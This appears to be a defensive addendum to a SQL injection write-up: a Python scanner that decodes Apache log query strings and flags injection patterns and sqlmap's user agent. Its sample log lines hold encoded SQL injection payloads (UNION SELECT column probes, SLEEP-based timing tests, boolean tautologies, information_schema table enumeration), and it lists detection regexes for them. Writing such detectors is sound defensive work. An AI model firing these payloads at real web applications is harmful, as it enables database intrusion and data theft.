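A defender-side counterpart to the sqlmap run above, added here as an example that is not part of the original post: a small log scanner that URL-decodes each query parameter of Apache combined-log lines and tags the request patterns the techniques in this write-up leave behind (UNION SELECT, information_schema access, SLEEP() delays, quote-led boolean tests such as ' OR NOT 2767=2767, trailing comment terminators, and sqlmap's default user agent). The log lines are constructed, modelled on the manual probes and sqlmap payloads shown here, with made-up client addresses, timestamps and user-agent strings and a shortened hex marker; the signature names and the log-format regex are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines (addresses, times and user agents are
# made up; the query strings follow the payloads shown in this write-up).
SAMPLE_LOG = r"""
203.0.113.5 - - [31/May/2019:17:37:46 +0800] "GET /ab.php?item_id=33 HTTP/1.1" 200 5120 "-" "sqlmap/1.3#stable (http://sqlmap.org)"
203.0.113.5 - - [31/May/2019:17:38:15 +0800] "GET /ab.php?item_id=33%27%20OR%20NOT%202767%3D2767%23 HTTP/1.1" 200 4801 "-" "sqlmap/1.3#stable (http://sqlmap.org)"
203.0.113.5 - - [31/May/2019:17:39:16 +0800] "GET /ab.php?item_id=33%27%20OR%20SLEEP%285%29--%20NkvG HTTP/1.1" 200 5120 "-" "sqlmap/1.3#stable (http://sqlmap.org)"
203.0.113.5 - - [31/May/2019:17:39:20 +0800] "GET /ab.php?item_id=33%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7170787071%2C0x41%2C0x7171766b71%29%2CNULL%2CNULL%23 HTTP/1.1" 200 5210 "-" "sqlmap/1.3#stable (http://sqlmap.org)"
198.51.100.7 - - [31/May/2019:17:40:01 +0800] "GET /ab.php?id=1&item_id=33%27%20and%201%3D2%20union%20select%201%2C2%2C3%2C4%2CTABLE_NAME%2C6%2C7%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA%3D%27dbcalin%27%20limit%200%2C1%20--%20ss HTTP/1.1" 200 5300 "-" "python-requests/2.21.0"
192.0.2.9 - - [31/May/2019:17:41:10 +0800] "GET /ab.php?id=1&item_id=34 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Content signatures applied to each decoded parameter value (names are assumptions).
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("time-based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    # a quote followed by OR/AND and a numeric comparison: ' OR NOT 2767=2767, ' and 1=2
    ("boolean-tautology", re.compile(r"'\s*(?:or|and)\s+(?:not\s+)?\d+\s*=\s*\d+", re.I)),
    # "-- ss", "-- NkvG" or "#" used to discard the application's trailing quote
    ("sql-comment-tail", re.compile(r"(?:--\s|#)\s*\S*$")),
]


def parse_line(line):
    """Split one log line into fields and decode its query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl splits on & and = first, then percent-decodes each name and value,
    # so %3D inside a value does not create a new parameter
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the set of signature names that fire on this request."""
    tags = set()
    for _name, value in rec["params"]:
        for tag, pattern in SIGNATURES:
            if pattern.search(value):
                tags.add(tag)
    if "sqlmap" in rec["ua"].lower():
        tags.add("sqlmap-ua")
    return tags


def scan(log_text):
    """Scan a log and return one finding per request that matched anything."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "path": rec["path"], "tags": sorted(tags)})
    return findings


def per_client(findings):
    """Flagged requests per client address, the volume signal behind a 196-request run."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(hit["ts"], hit["ip"], hit["path"], ", ".join(hit["tags"]))
    print(per_client(hits))
```

Decoding before matching is the important detail: every payload arrives at least partly percent-encoded, so a pattern applied to the raw request line never sees `' UNION ALL SELECT`. The per-client count complements the content signatures; the run above made 196 requests to one parameter in about four minutes from a single address, which stands out even where an individual payload is missed.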